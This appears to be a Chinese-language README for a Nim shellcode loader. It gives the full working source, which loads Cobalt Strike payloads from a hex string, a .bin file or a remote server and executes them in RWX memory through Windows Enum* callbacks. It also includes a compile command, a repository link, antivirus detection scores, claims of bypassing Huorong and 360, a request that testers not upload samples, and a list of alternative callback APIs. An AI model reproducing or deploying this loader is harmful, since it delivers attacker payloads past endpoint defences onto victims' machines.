nim-shellcode-loader[vt查杀3/67][微步云沙箱1/24]

使用方法

①可payload直接键入上线

注意:除了加载bin文件是不用额外操作之外 其他的加载方式都需要把payload中的\x删去

②可加载bin文件上线

即cs里面生成的raw

③可请求远程服务器获取payload

也可以请求github/gitee获取payload

注意:放在远程服务器上的必须是去掉\x的
如图所示:

查杀情况

import httpclient
import streams
import OpenSSL
import os
import strutils
import winim/lean
import osproc
import stew/byteutils
import net
proc shellcodeCallback(shellcode: openarray[byte]): void =
  ## Copies `shellcode` into a newly allocated RWX region and transfers
  ## control to it by passing the region's address to EnumSystemGeoID as
  ## the enumeration callback.
  ## From an analysis/detection standpoint the observable sequence is:
  ## VirtualAlloc(PAGE_EXECUTE_READ_WRITE) -> copyMem -> a Win32 Enum* API
  ## called with a callback pointer that lies outside any loaded module.
  ## `shellcode` is only read; nothing about its contents is validated.
  echo "[*] T00ls.cc Nim-shellcode-loader shadowwolf"
  let CurrentProcess = GetCurrentProcessId()
  echo "[*] Target Process: ", CurrentProcess
  echo "[*] Length Of Shellcode: ", len(shellcode)
  echo "[+] Injecting!"
  # Discarded string literal: embeds the text in the binary, no runtime effect.
  discard """
T00ls.cc 14454-shadowwolf
"""
  # Application for memory: a single committed region, sized to the payload,
  # that is writable and executable at the same time (W^X violation).
  let rPtr = VirtualAlloc(
    nil,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )

  # Copy Shellcode to the allocated memory section
  copyMem(rPtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len))

  # Callback execution: the API invokes its callback argument, so control
  # lands at rPtr. The first argument is the GEOCLASS value (16 ==
  # GEOCLASS_NATION, as spelled out in the alternative listing on this page).
  EnumSystemGeoID(
    16,
    0,
    cast[GEO_ENUMPROC](rPtr)
  )
proc RequestGet(url:string,header={"user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"}):string=
  ## Performs a GET of `url` with `header` as request headers and returns
  ## the response body with every "\x", "," and " " stripped, i.e. a bare
  ## hex string ready for hexToByteArray.
  ## TLS certificate verification is disabled (CVerifyNone), so the payload
  ## source is not authenticated; the only network observable is the request
  ## itself, carrying the browser-like user-agent in the default header.
  type
    sslContext=ref object  # declared but not used; the named argument below
                           # refers to newHttpClient's own parameter
  var
    client = newHttpClient(sslContext=newContext(verifyMode=CVerifyNone))
    RequestHeaders=newHttpHeaders(header)
    resp=client.request(url,headers=RequestHeaders)
  return resp.bodyStream.readAll().replace("\\x"," ").replace(",","").replace(" ","")
#To get the shellcode on the website you put on
proc GetShellcodeAndRun(para:string):void=
  ## Resolves `para` to a byte payload and hands it to shellcodeCallback.
  ## Three source forms are tried, in this order:
  ##   - `para` contains "http": fetched via RequestGet, then hex-decoded
  ##     (the payload is not present in the binary; it arrives at runtime);
  ##   - `para` names an existing file: read verbatim (a raw .bin);
  ##   - anything else: treated as an inline hex string.
  ## The URL test is a plain substring match, so any argument containing
  ## "http" takes the download branch regardless of whether it is a URL.
  if("http" in para):
    echo "[*] Get the shellcode on the website:"&para
    let resp=RequestGet(para)#Get the shellcode on your website
    var shellcode = newSeq[byte](len(resp) div 2)#calc the length
    hexToByteArray(resp, shellcode)#convert hex string into array
    shellcodeCallback(shellcode)#execute
  elif fileExists(para):
    echo "[*] Get the file:"&para
    var
      filename = para
      file: File
    file = open(filename, fmRead)
    var fileSize = file.getFileSize()
    var shellcode = newSeq[byte](fileSize)
    # Return value (bytes actually read) is discarded; a short read leaves
    # the tail of `shellcode` zero-filled.
    discard file.readBytes(shellcode, 0, fileSize)
    file.close()
    shellcodeCallback(shellcode)
  else:
    echo "[*] Get the string:"&para
    var hexstr: string = para
    var shellcode = newSeq[byte](len(hexstr) div 2)
    hexToByteArray(hexstr, shellcode)
    shellcodeCallback(shellcode)
# Entry point: the first command-line argument selects the payload source
# (URL, file path or inline hex string). With no argument the program exits
# without doing anything.
if paramCount()>=1:
  var para:string=paramStr(1)
  GetShellcodeAndRun(para)

过火绒,360全家桶 要试的哥哥不要开上传样本 谢谢啦

编译生成exe: nim c –cpu:i386 -d:mingw -d:ssl –opt:size shellcode_loader.nim

gitee:https://gitee.com/oagi/nim_shellloader

源码中的EnumSystemGeoID回调函数可以换成以下函数 等价

# Callback execution
EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①
EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②
EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③
EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤
EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥
EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦
EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧
EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨
EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩
EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11
EnumWindows(cast[WNDENUMPROC](rPtr), nil)#12